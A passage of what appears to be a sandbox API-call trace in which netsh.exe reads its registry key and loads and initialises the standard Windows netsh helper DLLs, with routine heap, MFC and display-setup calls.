GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382220 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382240 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382260 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382280 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3822a0 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3822c0 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3822e0 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382300 [0047.941] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0047.941] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0047.941] GetProcessHeap () returned 0x360000 [0047.941] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x28) returned 0x37e060 [0047.941] GetProcessHeap () returned 0x360000 [0047.941] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x2) returned 0x382890 [0047.941] GetProcessHeap () returned 0x360000 [0047.941] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x14) returned 0x382320 [0047.941] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0047.941] GetProcessHeap () returned 0x360000 [0047.941] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x360000) returned 1 [0047.941] GetProcessHeap () returned 0x360000 [0047.941] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x58) returned 0x3828b0 [0047.941] GetProcessHeap () returned 0x360000 [0047.941] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x360000) returned 1 [0047.941] GetProcessHeap () returned 0x360000 [0047.941] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xb0) returned 0x382910 [0047.941] GetProcessHeap () returned 0x360000 [0047.941] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3828b0 | out: hHeap=0x360000) returned 1 [0047.941] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x2875c8 | out: phkResult=0x2875c8*=0x90) returned 0x0 [0047.942] RegQueryInfoKeyW (in: hKey=0x90, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2875f0, lpcbMaxValueNameLen=0x287600, lpcbMaxValueLen=0x2875f8, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2875f0*=0x15, lpcbMaxValueNameLen=0x287600, lpcbMaxValueLen=0x2875f8, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.942] GetProcessHeap () returned 0x360000 [0047.942] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x16) returned 0x382340 [0047.942] GetProcessHeap () returned 0x360000 [0047.942] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x23) returned 0x37e090 [0047.942] RegEnumValueW (in: hKey=0x90, dwIndex=0x0, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="4", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0047.942] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0047.942] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0047.942] GetProcessHeap () returned 0x360000 [0047.942] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x50) returned 0x3828b0 [0047.942] GetProcessHeap () returned 0x360000 [0047.942] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x4) returned 0x3829d0 [0047.942] GetProcessHeap () returned 0x360000 [0047.942] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1a) returned 0x37e0c0 [0047.942] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0047.942] GetProcessHeap () returned 0x360000 [0047.942] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37e060 | out: hHeap=0x360000) returned 1 [0047.942] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x7fef8770000 [0052.369] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x286fc0 | out: lpSystemTimeAsFileTime=0x286fc0*(dwLowDateTime=0xf26c3ca0, dwHighDateTime=0x1d4f17e)) [0052.369] GetCurrentProcessId () returned 0x9f0 [0052.369] GetCurrentThreadId () returned 0x9f4 [0052.369] GetTickCount () returned 0x1bb14 [0052.369] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x286fc8 | out: lpPerformanceCount=0x286fc8*=17217807996) returned 1 [0052.372] LoadLibraryA (lpLibFileName="MSVCRT.DLL") returned 0x7fefdad0000 [0052.374] GetVersion () returned 0x1db10106 [0052.374] SetErrorMode (uMode=0x0) returned 0x0 [0052.374] SetErrorMode (uMode=0x8001) returned 0x0 [0052.376] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x384360 [0052.377] LocalFree (hMem=0x384360) returned 0x0 [0052.377] GetVersion () returned 0x1db10106 [0052.378] GlobalLock (hMem=0x930008) returned 0x384360 [0052.391] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x384580 [0052.391] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x383080 [0052.391] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x382360 [0052.392] malloc (_Size=0x100) returned 0x607c80 [0052.392] __dllonexit () returned 0x7fef437621c [0052.392] __dllonexit () returned 0x7fef43766e0 [0052.393] __dllonexit () returned 0x7fef43772b8 [0052.393] __dllonexit () returned 0x7fef43787cc [0052.393] __dllonexit () returned 0x7fef4378d64 [0052.393] __dllonexit () returned 0x7fef4378db4 [0052.393] __dllonexit () returned 0x7fef4378e70 [0052.393] __dllonexit () returned 0x7fef437a308 [0052.394] __dllonexit () returned 0x7fef4378810 [0052.394] __dllonexit () returned 0x7fef4387598 [0052.394] __dllonexit () returned 0x7fef4378880 [0052.395] __dllonexit () returned 0x7fef437a170 [0052.395] __dllonexit () returned 0x7fef437a280 [0052.395] __dllonexit () returned 0x7fef437ad44 [0052.395] __dllonexit () returned 0x7fef437bc30 [0052.395] __dllonexit () returned 0x7fef437bc80 [0052.395] __dllonexit () returned 0x7fef437c338 [0052.395] __dllonexit () returned 0x7fef437d030 [0052.395] __dllonexit () returned 0x7fef43759cc [0052.396] __dllonexit () returned 0x7fef43759f0 [0052.396] __dllonexit () returned 0x7fef4375a1c [0052.397] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fd [0052.401] __dllonexit () returned 0x7fef4387568 [0052.401] __dllonexit () returned 0x7fef4387574 [0052.401] __dllonexit () returned 0x7fef4387580 [0052.401] __dllonexit () returned 0x7fef438758c [0052.401] GetVersion () returned 0x1db10106 [0052.402] GetVersion () returned 0x1db10106 [0052.402] GetVersion () returned 0x1db10106 [0052.402] __dllonexit () returned 0x7fef42da15c [0052.402] __dllonexit () returned 0x7fef42e6610 [0052.402] __dllonexit () returned 0x7fef4378910 [0052.402] __dllonexit () returned 0x7fef4378b90 [0052.402] __dllonexit () returned 0x7fef4378bb4 [0052.402] __dllonexit () returned 0x7fef42f6ae0 [0052.402] GetVersion () returned 0x1db10106 [0052.402] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0052.403] GetSystemMetrics (nIndex=11) returned 32 [0052.404] GetSystemMetrics (nIndex=12) returned 32 [0052.404] GetSystemMetrics (nIndex=2) returned 17 [0052.404] GetSystemMetrics (nIndex=3) returned 17 [0052.404] GetDC (hWnd=0x0) returned 0x1601025b [0052.404] GetDeviceCaps (hdc=0x1601025b, index=88) returned 96 [0052.404] GetDeviceCaps (hdc=0x1601025b, index=90) returned 96 [0052.404] ReleaseDC (hWnd=0x0, hDC=0x1601025b) returned 1 [0052.404] GetSysColor (nIndex=15) returned 0xf0f0f0 [0052.404] GetSysColor (nIndex=16) returned 0xa0a0a0 [0052.404] GetSysColor (nIndex=20) returned 0xffffff [0052.404] GetSysColor (nIndex=18) returned 0x0 [0052.404] GetSysColor (nIndex=6) returned 0x646464 [0052.404] GetSysColorBrush (nIndex=15) returned 0x1100059 [0052.404] GetSysColorBrush (nIndex=6) returned 0x1100061 [0052.404] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0052.404] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0052.404] __dllonexit () returned 0x7fef4378f84 [0052.404] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fe [0052.405] __dllonexit () returned 0x7fef4303990 [0052.405] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0052.409] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0052.409] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0052.409] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0052.409] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0052.409] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0052.409] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0052.409] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0052.409] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0052.409] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0052.410] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0052.410] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0052.410] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fe [0052.410] __dllonexit () returned 0x7fef43875a4 [0052.410] __dllonexit () returned 0x7fef43875bc [0052.411] __dllonexit () returned 0x7fef43875c8 [0052.411] __dllonexit () returned 0x7fef43875d4 [0052.411] __dllonexit () returned 0x7fef43875e0 [0052.411] GetCursorPos (in: lpPoint=0x7fef43e26d8 | out: lpPoint=0x7fef43e26d8*(x=369, y=550)) returned 1 [0052.412] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x3848d0 [0052.412] LocalReAlloc (hMem=0x382360, uBytes=0x18, uFlags=0x2) returned 0x3849e0 [0052.412] GetCurrentThread () returned 0xfffffffffffffffe [0052.412] GetCurrentThreadId () returned 0x9f4 [0052.412] __dllonexit () returned 0x7fef437cfa4 [0052.412] SetErrorMode (uMode=0x0) returned 0x8001 [0052.412] SetErrorMode (uMode=0x8001) returned 0x0 [0052.412] GetModuleFileNameW (in: hModule=0x7fef42c0000, lpFilename=0x2866b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0052.412] wcscpy_s (in: _Destination=0x2868c0, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0052.413] FindResourceW (hModule=0x7fef42c0000, lpName=0xe01, lpType=0x6) returned 0x1409b0 [0052.437] LoadStringW (in: hInstance=0x7fef42c0000, uID=0xe000, lpBuffer=0x286ad0, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0052.437] wcscpy_s (in: _Destination=0x2866e4, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0052.437] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0052.466] malloc (_Size=0x80) returned 0x607eb0 [0052.466] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x384a00 [0052.467] GetSystemDirectoryA (in: lpBuffer=0x286d50, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.467] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0052.467] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0052.467] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0052.467] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0052.493] GetProcAddress (hModule=0x7fef8770000, lpProcName="InitHelperDll") returned 0x7fef878cf70 [0052.493] InitHelperDll () returned 0x0 [0052.494] RegisterHelper () returned 0x0 [0052.494] GetProcessHeap () returned 0x360000 [0052.494] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x108) returned 0x386b10 [0052.494] GetProcessHeap () returned 0x360000 [0052.494] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x382910 | out: hHeap=0x360000) returned 1 [0052.495] RegisterHelper () returned 0x0 [0052.495] GetProcessHeap () returned 0x360000 [0052.495] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x160) returned 0x386c20 [0052.495] GetProcessHeap () returned 0x360000 [0052.495] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x386b10 | out: hHeap=0x360000) returned 1 [0052.495] RegisterHelper () returned 0x0 [0052.495] GetProcessHeap () returned 0x360000 [0052.495] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1b8) returned 0x386d90 [0052.495] GetProcessHeap () returned 0x360000 [0052.495] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x386c20 | out: hHeap=0x360000) returned 1 [0052.495] RegisterHelper () returned 0x0 [0052.495] GetProcessHeap () returned 0x360000 [0052.495] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x210) returned 0x386b10 [0052.495] GetProcessHeap () returned 0x360000 [0052.495] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x386d90 | out: hHeap=0x360000) returned 1 [0052.495] RegisterHelper () returned 0x0 [0052.495] GetProcessHeap () returned 0x360000 [0052.495] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x268) returned 0x386d30 [0052.496] GetProcessHeap () returned 0x360000 [0052.496] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x386b10 | out: hHeap=0x360000) returned 1 [0052.496] RegEnumValueW (in: hKey=0x90, dwIndex=0x1, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="nshwfp", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0052.496] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0052.496] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0052.496] GetProcessHeap () returned 0x360000 [0052.496] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x78) returned 0x382910 [0052.496] GetProcessHeap () returned 0x360000 [0052.496] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xe) returned 0x382360 [0052.496] GetProcessHeap () returned 0x360000 [0052.496] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x16) returned 0x382380 [0052.496] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0052.496] GetProcessHeap () returned 0x360000 [0052.496] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3828b0 | out: hHeap=0x360000) returned 1 [0052.496] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x7fef3610000 [0054.697] GetProcAddress (hModule=0x7fef3610000, lpProcName="InitHelperDll") returned 0x7fef367b6d0 [0054.697] InitHelperDll () returned 0x0 [0054.698] RegisterHelper () returned 0x0 [0054.698] GetProcessHeap () returned 0x360000 [0054.698] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x2c0) returned 0x390ed0 [0054.698] GetProcessHeap () returned 0x360000 [0054.698] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x386d30 | out: hHeap=0x360000) returned 1 [0054.698] RegEnumValueW (in: hKey=0x90, dwIndex=0x2, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="dhcpclient", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0054.699] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0054.699] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0054.699] GetProcessHeap () returned 0x360000 [0054.699] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xa0) returned 0x386d30 [0054.699] GetProcessHeap () returned 0x360000 [0054.699] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x16) returned 0x3823a0 [0054.699] GetProcessHeap () returned 0x360000 [0054.699] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x22) returned 0x387360 [0054.699] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0054.699] GetProcessHeap () returned 0x360000 [0054.699] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x382910 | out: hHeap=0x360000) returned 1 [0054.699] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x7fef8840000 [0056.262] GetProcAddress (hModule=0x7fef8840000, lpProcName="InitHelperDll") returned 0x7fef8841a40 [0056.262] InitHelperDll () returned 0x0 [0056.263] RegisterHelper () returned 0x0 [0056.263] GetProcessHeap () returned 0x360000 [0056.263] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x318) returned 0x395e60 [0056.263] GetProcessHeap () returned 0x360000 [0056.263] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x390ed0 | out: hHeap=0x360000) returned 1 [0056.263] RegEnumValueW (in: hKey=0x90, dwIndex=0x3, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="wshelper", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0056.263] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0056.263] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0056.264] GetProcessHeap () returned 0x360000 [0056.264] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xc8) returned 0x390ed0 [0056.264] GetProcessHeap () returned 0x360000 [0056.264] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x12) returned 0x393610 [0056.264] GetProcessHeap () returned 0x360000 [0056.264] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1a) returned 0x391620 [0056.264] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0056.264] GetProcessHeap () returned 0x360000 [0056.264] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x386d30 | out: hHeap=0x360000) returned 1 [0056.264] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x7fef8810000 [0056.605] GetProcAddress (hModule=0x7fef8810000, lpProcName="InitHelperDll") returned 0x7fef8811720 [0056.605] InitHelperDll () returned 0x0 [0056.613] RegisterHelper () returned 0x0 [0056.613] GetProcessHeap () returned 0x360000 [0056.613] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x370) returned 0x396bd0 [0056.613] GetProcessHeap () returned 0x360000 [0056.614] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x395e60 | out: hHeap=0x360000) returned 1 [0056.615] RegEnumValueW (in: hKey=0x90, dwIndex=0x4, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="nshhttp", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0056.615] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0056.615] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0056.615] GetProcessHeap () returned 0x360000 [0056.615] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xf0) returned 0x395e60 [0056.615] GetProcessHeap () returned 0x360000 [0056.615] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x393630 [0056.615] GetProcessHeap () returned 0x360000 [0056.615] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x18) returned 0x393650 [0056.615] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0056.615] GetProcessHeap () returned 0x360000 [0056.615] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x390ed0 | out: hHeap=0x360000) returned 1 [0056.615] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x7fef8800000 [0056.992] GetProcAddress (hModule=0x7fef8800000, lpProcName="InitHelperDll") returned 0x7fef8801c24 [0056.992] InitHelperDll () returned 0x0 [0056.992] RegisterHelper () returned 0x0 [0056.992] GetProcessHeap () returned 0x360000 [0056.992] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x3c8) returned 0x396f50 [0056.992] GetProcessHeap () returned 0x360000 [0056.992] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x396bd0 | out: hHeap=0x360000) returned 1 [0056.993] RegEnumValueW (in: hKey=0x90, dwIndex=0x5, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="fwcfg", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0056.993] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0056.993] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0056.993] GetProcessHeap () returned 0x360000 [0056.993] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x118) returned 0x395f60 [0056.993] GetProcessHeap () returned 0x360000 [0056.993] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xc) returned 0x393670 [0056.993] GetProcessHeap () returned 0x360000 [0056.993] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x14) returned 0x393690 [0056.993] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0056.995] GetProcessHeap () returned 0x360000 [0056.995] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x395e60 | out: hHeap=0x360000) returned 1 [0056.995] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x7fef85f0000 [0057.341] GetProcAddress (hModule=0x7fef85f0000, lpProcName="InitHelperDll") returned 0x7fef85f2d20 [0057.341] InitHelperDll () returned 0x0 [0057.341] RegisterHelper () returned 0x0 [0057.341] GetProcessHeap () returned 0x360000 [0057.341] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x420) returned 0x39b320 [0057.341] GetProcessHeap () returned 0x360000 [0057.341] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x396f50 | out: hHeap=0x360000) returned 1 [0057.341] RegEnumValueW (in: hKey=0x90, dwIndex=0x6, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="authfwcfg", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0057.341] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0057.341] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0057.341] GetProcessHeap () returned 0x360000 [0057.341] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x140) returned 0x396bd0 [0057.341] GetProcessHeap () returned 0x360000 [0057.341] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x14) returned 0x3936d0 [0057.341] GetProcessHeap () returned 0x360000 [0057.341] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1c) returned 0x396750 [0057.341] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0057.342] GetProcessHeap () returned 0x360000 [0057.342] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x395f60 | out: hHeap=0x360000) returned 1 [0057.342] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x7fef3990000 [0057.854] GetProcAddress (hModule=0x7fef3990000, lpProcName="InitHelperDll") returned 0x7fef3995d20 [0057.854] InitHelperDll () returned 0x0 [0057.859] RegisterHelper () returned 0x0 [0057.859] GetProcessHeap () returned 0x360000 [0057.859] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x478) returned 0x39e7d0 [0057.859] GetProcessHeap () returned 0x360000 [0057.859] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39b320 | out: hHeap=0x360000) returned 1 [0057.859] RegisterHelper () returned 0x0 [0057.859] GetProcessHeap () returned 0x360000 [0057.860] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x4d0) returned 0x39ec50 [0057.860] GetProcessHeap () returned 0x360000 [0057.860] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39e7d0 | out: hHeap=0x360000) returned 1 [0057.860] RegisterHelper () returned 0x0 [0057.860] GetProcessHeap () returned 0x360000 [0057.860] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x528) returned 0x39f130 [0057.860] GetProcessHeap () returned 0x360000 [0057.860] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39ec50 | out: hHeap=0x360000) returned 1 [0057.860] RegisterHelper () returned 0x0 [0057.860] GetProcessHeap () returned 0x360000 [0057.860] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x580) returned 0x39e7d0 [0057.860] GetProcessHeap () returned 0x360000 [0057.860] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39f130 | out: hHeap=0x360000) returned 1 [0057.860] RegisterHelper () returned 0x0 [0057.860] GetProcessHeap () returned 0x360000 [0057.861] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x5d8) returned 0x39ed60 [0057.861] GetProcessHeap () returned 0x360000 [0057.861] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39e7d0 | out: hHeap=0x360000) returned 1 [0057.861] RegEnumValueW (in: hKey=0x90, dwIndex=0x7, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="2", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0057.861] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0057.861] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0057.861] GetProcessHeap () returned 0x360000 [0057.861] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x168) returned 0x397170 [0057.861] GetProcessHeap () returned 0x360000 [0057.861] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x4) returned 0x391180 [0057.861] GetProcessHeap () returned 0x360000 [0057.861] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x14) returned 0x39e200 [0057.861] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0057.861] GetProcessHeap () returned 0x360000 [0057.861] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x396bd0 | out: hHeap=0x360000) returned 1 [0057.861] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x7fef87e0000 [0058.385] GetProcAddress (hModule=0x7fef87e0000, lpProcName="InitHelperDll") returned 0x7fef87e1924 [0058.385] InitHelperDll () returned 0x0 